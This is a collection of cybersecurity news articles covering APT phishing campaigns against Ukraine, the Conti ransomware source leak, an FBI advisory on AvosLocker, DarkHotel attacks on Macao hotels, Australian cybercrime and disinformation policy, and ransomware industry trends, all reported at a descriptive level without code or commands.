Information Technology

Ukrainian security officials have warned of ongoing attacks by InvisiMole, a hacking group with ties to the Russian advanced persistent threat (APT) group Gamaredon. 

Ukraine Crisis

Last week, the Computer Emergency Response Team for Ukraine (CERT-UA) said that the department has been advised of new phishing campaigns taking place against Ukrainian organizations that spread the LoadEdge backdoor. According to CERT-UA, phishing emails are being sent that have an attached archive, 501_25_103.zip, together with a shortcut (LNK) file. If opened, an HTML Application file (HTA) downloads and executes VBScript designed to deploy LoadEdge.  Once the backdoor has formed a link to an InvisiMole command-and-control (C2) server, other malware payloads are deployed and executed including TunnelMole, malware that abuses the DNS protocol to form a tunnel for malicious software distribution, and both RC2FM and RC2CL, which are data collection and surveillance backdoor modules. Persistence is maintained through the Windows registry.  InvisiMole was first discovered by ESET researchers in 2018. The threat actors have been active since at least 2013 and have been connected to attacks against “high-profile” organizations in Eastern Europe that are involved in military activities and diplomatic missions.  In 2020, the cybersecurity researchers forged a collaborative link between InvisiMole and Gamaredon/Primitive Bear, the latter of which appears to be involved in initially infiltrating networks before InvisiMole begins its own operation.  “We discovered InvisiMole’s arsenal is only unleashed after another threat group, Gamaredon, has already infiltrated the network of interest, and possibly gained administrative privileges,” ESET said at the time. “This allows the InvisiMole group to devise creative ways to operate under the radar.” Palo Alto Networks has also been tracking Gamaredon, and in February, said the APT had attempted to compromise an unnamed “Western government entity” in Ukraine through fake job listings.  CERT-UA has also begun tracking the activities of Vermin/UAC-0020, a group that has been attempting to break into the systems of Ukrainian state authorities. Vermin has been using the topic of supplies in spear phishing emails as a lure, and if opened by a victim, these emails contain a letter and password-protected archive containing the Spectr malware.  In 2018, ESET and Palo Alto Networks published research on Vermin, a group that has been active for at least the past four years, although may date back as far as 2015.  Vermin was targeting Ukrainian government institutions from the outset, with remote access Trojans (RATs) Quasar, Sobaken, and Vermin being the malicious tools of choice.  While the variants of Quasar and Sobaken were compiled using freely-available open source code, Vermin is called a “custom-made” RAT able to perform activities including data exfiltration, keylogging, audio recording, and credential theft.  In related news this month, Aqua Security’s Team Nautilus said that public cloud repositories are being used to host resources on both sides of the war, with Ukraine’s call for an “IT Army” of volunteers becoming a catalyst for public tools to launch denial-of-service (DoS) attacks against online Russian services.  It is not just RATs and surveillance-based malware that Ukrainian organizations are having to contend with. ESET has detected three forms of wiper malware – designed to destroy computer files and resources, rather than to steal information or spy on victims – in as many weeks.  The latest wiper, dubbed CaddyWiper, has been found “on a few dozen systems in a limited number of organizations,” according to ESET. Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

New versions of Conti’s ransomware source code have been reportedly leaked by a researcher displeased with the group’s public declaration of support to Russia. 

As reported by Bleeping Computer, a cybersecurity researcher took umbrage when the cybercriminals publicly said they supported Russia’s invasion of Ukraine. In revenge, the individual, believed to hail from Ukraine, has been giving the ransomware operators a taste of their own hacking medicine. Conti is a Russian-speaking ransomware group that also operates a ransomware-as-a-service (RaaS) business model. While some ransomware payments are made in the millions, Coveware estimates that the average demand made by Conti members is just over $765,000.  Over the weekend, a link to the new package was published under the “Conti Leaks” Twitter handle. The source code has been uploaded to VirusTotal and while password-protected, the information required to open the file is available to cybersecurity teams.  Previously, the pro-Ukraine individual leaked an older version of the ransomware.  Stealing and releasing the ransomware’s source code gives cybersecurity researchers and vendors the opportunity to analyze the malware and potentially create denylists, defenses, and decryptors. However, on the flip side, attackers could also grab and adapt the code for their own malware campaigns.  Conti’s declaration of support for Russia’s invasion of Ukraine also led to the leak of the group’s internal chat logs. According to the logs, Conti is made up of individuals tasked with different duties – including malware coders, tests, system administrators and ‘HR’ personnel who deal with hires, as well as negotiators who deal with victims and try to ensure a blackmail payment is made.  Check Point researchers analyzed the leaked data and came to an interesting conclusion concerning the Conti hiring process: while some members are recruited through underground forums, others aren’t even told that they are interviewing with cybercriminals. Instead, some potential hires were told that they would be helping in the development of software for legitimate penetration testers and analytics. Conti is known for its devastating cyberattack on Ireland’s Health Service Executive in May 2021, and while the country’s healthcare system refused to pay the millions of dollars demanded as a ransomware payment, reports suggested that the HSE is footing a bill of over $48 million to recover.   The US Cybersecurity and Infrastructure Security Agency (CISA) and FBI have previously warned organizations of Conti activity. It is estimated that hundreds of organizations in the United States alone have fallen prey to Conti. Last week, Google exposed the inner workings of Exotic Lily, an initial access broker (IAB) that sells network access to threat groups including Conti and Diavol. Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

AvosLocker, a ransomware-as-a-service menace that launched in July 2021, continues to attack US critical infrastructure, the US Federal Bureau of Investigations (FBI) has warned in an advisory. The AvosLocker gang has targeted victims in the US within financial services, critical manufacturing, and government facilities, according to the FBI. 

ZDNet Recommends

“AvosLocker claims to directly handle ransom negotiations, as well as the publishing and hosting of exfiltrated victim data after their affiliates infect targets,” the FBI’s Internet Crime Center (IC3) reports. SEE: Cybersecurity: Let’s get tactical (ZDNet special report)AvosLocker hit the ransomware scene last year, cunningly using AnyDesk remote admin software in Windows Safe Mode to bypass anti-malware software. PaloAlto Networks’ assessed that AvosLocker is a marketing-savvy operation based on “press releases” it publishes on dark web forums to threaten victims and attract affiliates. “AvosLocker offers technical support to help victims recover after they’ve been attacked with encryption software that the group claims is “fail-proof,” has low detection rates and is capable of handling large files,” Palo Alto Networks said. The gang claims to have caused havoc at organizations in the US, the UK, the UAE, Belgium, Spain and Lebanon, with ransom demands ranging from $50,000 to $75,000.AvosLocker’s operators prefer ransom payments made in the popular Bitcoin alternative, Monero, but also accept Bitcoin at 10% to 25% above the current US dollar price, according to the FBI. The agency also warns that, in an unusual move, the gang might even phone up victims to pressure them into doing a deal.”In some cases, AvosLocker victims receive phone calls from an AvosLocker representative. The caller encourages the victim to go to the onion site to negotiate and threatens to post stolen data online. In some cases, AvosLocker actors will threaten and execute distributed denial-of-service (DDoS) attacks during negotiations,” the FBI said. DDoS attacks are unfortunately readily available, cheap and powerful.  The Windows AvosLocker app is written in C++ and runs as a console application that logs actions on victims’ machines and allows the attacker to remotely enable or disable “certain features”. It is a so-called double-extortion racket, where the attackers both steal and encrypt data. They steal data and threaten to leak the contents via a website to pressure victims into paying. The gang also started auctioning leaks to cash in on situations where a ransom negotiation failed – a product they borrowed from the notorious REvil ransomware gang.SEE: This sneaky type of phishing is growing fast because hackers are seeing big paydaysSoftware tools that AvosLocker has been observed using include the Cobalt Strike pen-testing kit, encoded PowerShell, the PuTTY Secure Copy client tool “pscp.exe”, Rclone, AnyDesk, Scanner, Advanced IP Scanner, and WinLister, according to the FBI document.The group also uses Proxy Shell bugs tracked as CVE-2021-31207, CVE-2021-34523, and CVE-2021-34473 that were disclosed in July, as well as last year’s Microsoft Exchange Server bug CVE-2021-26855. But the FBI notes that exactly how the attackers breach a target’s network depends on the skills of the AvosLocker affiliate carrying out the attack. The FBI’s advisory is another arm of the US government’s efforts via the Department of Homeland’s US Cybersecurity and Infrastructure Security Agency (CISA) to urge all organizations to patch everything and bolster cybersecurity amid fears that Russian state-sponsored hackers will target US organizations with destructive malware because of the West’s sanctions against Russia over its invasion of Ukraine. More

A new wave of suspected activity conducted by the DarkHotel advanced persistent threat (APT) group has been disclosed by researchers. Last week, Trellix researchers Thibault Seret and John Fokker said that a malicious campaign has been targeting luxury hotels in Macao, China since November 2021, and based on clues in the attack vector and malware used, the team suspects DarkHotel is the culprit.  DarkHotel is a South Korean APT that uses tailored spear phishing attacks. The APT has been active in the hospitality, government, automotive, and pharmaceutical industries since at least 2007 and tends to focus on surveillance and data theft, with business and industry leaders marked as targets.  If you’re looking to compromise high-value targets such as CEOs and other executives, it makes sense to target high-end locations they are likely to book in with. According to Trellix, major hotel chains in Macao, China — including the Grand Coloane Resort and Wynn Palace — are now among the APT’s victims.  DarkHotel’s campaign began with a spear phishing email sent to appear to be from the “Macao Government Tourism Office” to management staff in the luxury hotels, including front office and HR employees, who were likely to have access to guest booking systems.  The emails contained an Excel sheet lure requesting the completion of a form for a guest inquiry, and if macros are enabled by the victim in order to read the document, the macros trigger the download and execution of malware payloads. Once the researchers peeled back layers of obfuscation, they revealed a malware function designed to create a scheduled task for persistence and the launch of VBS and PowerShell scripts to establish a connection to a hard-coded command-and-control (C2) server disguised as a service owned by the Federated States of Micronesia.   The attack chain has a number of similarities, including the IP address and C2 infrastructure in use, as a campaign documented by Zscaler in 2021.  Normally, you would expect the APT to then execute further payloads for credential harvesting and data theft. However, in this campaign, activity suddenly stopped in January.  “We suspect the group was trying to lay the foundation for a future campaign involving these specific hotels,” Trellix said. “After researching the event agenda for the targeted hotels, we did indeed find multiple conferences that would have been of interest to the threat actor. […] But even threat actors will get unlucky. Due to the rapid rise of COVID-19 in Macao and in China in general, most of [the] events were canceled or postponed.”Trellix has attributed the attacks to DarkHotel with a “moderate” level of confidence, based on IP addresses already linked to the APT and “known development patterns” clues hidden in the malware’s C2 server.  However, the team acknowledges that this may not be enough for full attribution, especially when some threat groups are known to plant false flags to lead the cybersecurity community to believe their work is that of another, thereby staying under the radar.  “Regardless of the exact threat actor attribution, this campaign demonstrates that the hospitality sector is indeed a valid target for espionage operations,” the researchers say. “Executives should be aware that the (cyber) security of their respective organizations doesn’t stop at the edge of their network.” Back in 2020, Qihoo 360 attributed an ongoing wave of cyberattacks launched against Chinese government agencies and their employees to the APT.  The cybersecurity researchers said that a zero-day vulnerability was used to compromise at least 200 Sangfor SSL virtual private network (VPN) servers, many of which were used by government entities in Beijing and Shanghai, as well as departments involved in Chinese diplomacy.  While the COVID-19 pandemic has severely disrupted the travel industry and the rising cost of both living and transport may keep tourists away for longer, threat actors will continue to try and obtain valuable information from hotels and their guests.  When you’re on the road, it is advisable to keep basic security standards up, and while you can’t prevent security incidents such as the compromise of point-of-sale (PoS) systems, using mobile networks rather than public Wi-Fi hotspots is recommended, as well as the use of virtual private networks (VPN) and fully updated software.  Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Image: Getty Images
The Australian federal government has pledged new laws for cracking down against the spread of harmful disinformation and misinformation on social media. Under the proposed laws, the Australian Communications and Media Authority (ACMA) would gain an expanded set of powers for enforcing voluntary industry codes of practice should platforms’ actions prove inadequate. “This will encourage platforms to be ambitious in addressing the harms of disinformation and misinformation, while providing ACMA with the ability to hold platforms to account should their voluntary efforts prove inadequate or untimely,” Communications Minister Paul Fletcher said. The announcement of these laws come a year after large digital platforms, including Facebook, Google, TikTok, and Twitter, among others launched a voluntary code of practice for addressing misinformation online. Since the voluntary code’s launch, the federal government has repeatedly criticised the efforts of social media platforms to address misinformation and disinformation. Australian Prime Minister Scott Morrison last year criticised tech giants for the conduct that occurs on their platforms, stating that social media platforms like Facebook have become a “coward’s palace” for trolls.  Beyond new powers for scrutinising the voluntary code, the laws also look to give ACMA new information-gathering powers to improve access to Australian-specific data about measures for addressing disinformation and misinformation. “Digital platforms must take responsibility for what is on their sites and take action when harmful or misleading content appears,” Communications Minister Paul Fletcher said. “This is our government’s clear expectation — and just as we have backed that expectation with action in recently passing the new Online Safety Act, we are taking action when it comes to disinformation and misinformation.” In addition, the federal government wants to establish a misinformation and disinformation action group to bring together key stakeholders across government and the private sector to collaborate and share information on emerging issues and best practice responses. The laws were created off the back of recommendations made by ACMA, which found most Australians are concerned about, and have experienced, online misinformation.In terms of when laws will be tabled, Fletcher has said the online disinformation legislation will not be introduced into Parliament ahead of the upcoming federal election. Instead, the communications minister has provided a timeline of sometime in the second half of this year.Related Coverage More

Image: Getty Images
Australian Home Affairs Minister Karen Andrews has launched a centre to bolster the country’s cybercrime fighting efforts. The AU$89 million cybercrime centre forms part of Home Affairs’ national plan to combat cybercrime, which was announced alongside the centre’s launch on Monday morning. The AU$89 million was provided through the AU$1.67 billion in funding for Australia’s cybersecurity strategy by the federal government. Andrews said the national plan and the Australian Federal Police’s (AFP) new cybercrime centre, called Joint Policing Cybercrime Coordination Centre (JPC3), would bring together the experience, powers, capabilities, and intelligence needed to build a strong, multi-faceted response. “Using far-reaching Commonwealth legislation and high-end technical capabilities, the AFP’s new cybercrime centre will aggressively target cyber threats, shut them down, and bring offenders to justice,” Andrews said.”During the pandemic, cybercrime became one of the fastest-growing and most prolific forms of crime committed against Australians. The tools and the techniques used to rob or extort Australians became more effective and more freely available than ever before.”Home Affairs first announced the centre was being developed back in November, at the time explaining the AFP would use the centre to specifically focus on preventing cybercriminals from scamming, stealing, and defrauding Australians. Based in the AFP’s New South Wales headquarters, JPC3’s operations will be led by Australian Federal Police (AFP) assistant commissioner Justine Gough, who is the AFP’s first full-time executive dedicated to countering cybercrime. Looking at the national cybercrime plan, Home Affairs envisions governments at all levels will operate under a cybercrime-fighting framework prioritising three pillars: Preventing and protecting cybercrime; investigation, disrupting, and prosecuting cybercrime incidents; and helping victims recover from cybercrime incidents. Alongside launching the cybercrime centre, the plan also outlines a goal of establishing a national cybercrime forum that brings representatives from Commonwealth, state and territory justice departments, law enforcement agencies and regulators — such as the Office of the eSafety Commissioner — to develop a national cybercrime action plan. Last month, Home Affairs introduced three new Bills into Parliament, covering the federal government’s ransomware action plan, critical aviation and marine cybersecurity, and mobile phone access in prisons. The department is also pushing for a second tranche of cyber laws targeted at critical infrastructure sectors, which is currently being reviewed by a parliamentary committee, to become law. Labelled by Home Affairs Secretary Mike Pezzullo last month as the government’s defence against cyber threats, the federal government is hoping the second tranche of cyber laws will create a standardised critical infrastructure framework for Australia’s intelligence agencies. Related Coverage More

Image: Getty Images
When policy makers are dreaming about how cybersecurity will be handled in the future, it consists of governments issuing warnings to organisations, the community sharing intel with each other in real time, and the ecosystem being able to respond with a degree of unanimity.

For Cisco advisory CISO Helen Patton, that dream leaves out lots of organisations that are struggling underneath the security poverty line.”We’ve got a lot of organisations that don’t have the resources to be able to participate in that kind of environment. They’ve got old pieces of equipment, they don’t do automation, they don’t have the resources to make it happen, they’re never going to engage in that kind of environment,” Patton told ZDNet.”Maybe the financial sector, maybe the big companies that have got a lot of money that they can throw at this problem, might engage. But now you’re into these two tiers of security, we’ve got the upper tier that can take advantage of machine learning and artificial intelligence, and real-time info share.”And we’ve got everybody else who is hoping that some kid on a keyboard can do something about it, and obviously they won’t be able to. We will have a bifurcated security community is what we will end up with.”One way to lift those at the bottom is something akin to a co-operative, with Patton describing a community that shares resources and uses purchasing consortiums along with governments using the tools at their disposal to help under-resourced organisations help themselves.Previously, Patton spent a decade at JPMorganChase, and said even in banking it sometimes felt as though more security resources were needed.”I don’t know of anyone in any size organisation that feels like they’ve got everything they need, but I do think we need leadership to understand when they make a risk-based decision to put money in one area and not in security that they are taking a gamble, that they are making a choice that could lead to a real problem for them operationally,” she said. In order to help boards get to proper grips with risks and cybersecurity, Patton believes governments need to consider legislating a requirement for boards to have someone that understands technology and risk, and governments should be trying to inform the C-suite, not security professionals.”When AWS burps and half of social media goes out … do our CEOs and boards really understand that? No, they don’t,” Patton said.”We’ve got to get them educated on that. And the guy who’s trying to run a security program with one other guy and a dog doesn’t have time to sit and educate the board. The government does.”Stop training security people about how to do security better with no resources, and start training CEOs on how to think and manage the systemic risk, that’s what they should be doing.”Following legal requirements imposed by government on breach reporting, it should comes as no surprise that lawyers are getting involved with such a process, and Patton says CISOs are having to determine how to manage risk yet work with requirements that say all breaches are equally bad.”We’re seeing CISOs separate themselves operationally from the reporting requirements,” Patton said.”So now we’ve got lawyers who are making a decision about whether something is material enough to require a report, which is not really the spirit of the regulation. But I’ve seen it in Australia, and I’m seeing it overseas as well. “This is a coping mechanism because the reporting requirements are sort of vague.” The advisory CISO said reporting demands mean if an incident is in a low-risk area, no security lead is going to tell lawyers or regulators they were going to sit on it because it was assessed as low risk, as compared to critical infrastructure elsewhere.”These reporting requirements that say you’ve got 72 hours or 48 hours will generate a lot of inaccurate noise, that both the governments and the organisations will then have to unpick after the fact, once they have more information. There’s going to be a lot of misinformation, that goes out into the environment because of the short windows that we’re [dealing] with, it’s a challenge,” Patton said.”It’s not until you’ve had a certain amount of time to explore the incident, respond to the incident, learn from the incident that you really have good quality information. But our regulators want us to tell them immediately when something looks funny. And there’s lots of things that look funny in our environments, because our environments they’re inherently odd. “They’re going to get a lot of really bad signals early on, and we’re going to have to work out how do you talk about that publicly when the information is really asymmetrical in terms of what you know, and what’s actually happening. It’s a problem.”ZDNET’S MONDAY MORNING OPENER  ZDNet’s Monday Morning Opener is our opening take on the week in tech, written by members of our editorial team. We’re a global team so this editorial publishes on Monday at 8:00am AEST in Sydney, Australia, which is 6:00pm Eastern Time on Sunday in the US, and 10:00PM GMT in London.PREVIOUSLY ON MONDAY MORNING OPENER :  More

Over the past year, many ‘franchise’ deals and new partnerships have emerged in the Ransomware-as-a-Service (RaaS) industry. 

Special feature

Cyberwar and the Future of Cybersecurity

Today’s security threats have expanded in scope and seriousness. There can now be millions — or even billions — of dollars at risk when information security isn’t handled properly.

Read More

RaaS has arguably become one of the most prolific and dangerous threats to enterprise security today. Cybercriminals have worked out that they can make serious profits from leasing out their ransomware creations, and especially if it is used against large companies able to pay high ‘ransom’ payments to have their data decrypted after a successful infection. Furthermore, the industry has evolved over recent years to also include other roles — malware developers, native speakers of a language able to manage negotiations, and Initial Access Brokers (IABs) who offer network access to a target system, thereby speeding up RaaS operations.  Leak sites, too, are now common. When a ransomware group attacks a victim, they may steal sensitive corporate information before encrypting systems. The cybercriminals will then threaten to publish this data unless a payment is made.  On Friday, KELA published a report on ransomware operators’ overall trends and movements over 2021. The cybersecurity firm says that the number of major organizations tracked as ransomware victims increased from 1460 to 2860, with many appearing on ransomware leak sites and negotiation platforms.
KELA
In total, 65% of the leak sites monitored last year were managed by new players on the scene. The majority of targets are based in developed nations, including the US, Canada, Germany, Australia, Japan, and France.  Manufacturing, industrial companies, professional services, technology, engineering, and retail are among the sectors that are at the most risk of being targeted by ransomware operators.  However, once a company has been breached, this does not mean that the security headache is restricted to only one incident.  As an example, Party Rental appeared on Avaddon’s leak site in February 2021, and Conti allegedly claimed the same victim in September. Both groups shared data belonging to the company. Amey, too, appeared on Mount Locker’s domain and then Clop’s.  According to KELA, roughly 40 organizations compromised in 2020 were then hit by a separate ransomware group last year, and “it is possible the groups used the same initial access vector.”  “Operators of data leak sites, namely Marketo and Snatch, frequently claimed the same victims as many ransomware groups (Conti, Ragnar Locker, and more), hinting about possible collaboration,” the report says.Over 1300 access listings were posted in the underground by at least 300 IABs over 2021. LockBit, Avaddon, DarkSide, Conti, and BlackByte are among the Russian-speaking ransomware operators who frequently purchase access.  While some intrusions may be coincidental, it does appear that “franchise” businesses are emerging. Trend Micro previously connected the dots between Astro Team and Xing Team, both of which were allowed to use the Mount Locker ransomware under their own brand names. The same malware was in use, while each cybercriminal group maintained their own name-and-shame blogs. Some of the victims were duplicated in Astro/Xing Team and Mount Locker disclosures. In addition, 14 victim organizations were published under Quantum, Marketo, and Snatch blogs in 2021.  “Collaboration can mean that ransomware operators share stolen data with actors behind data leak sites on specific conditions,” the researchers say. “For operators, it can mean additional profits if the data is sold on a data leak site or simply more intimidating to the victim (or future victims). Aside from collaboration, as between ransomware groups, actors behind these data leak sites can use the same entry vector or attack the same company via different initial access.”Some of the major ransomware players vanished in 2021 — although they may emerge again under different brands — including BlackMatter and REvil. New groups including Alphv, Hive, and AvosLocker have emerged to fill the gap. See alsoHave a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More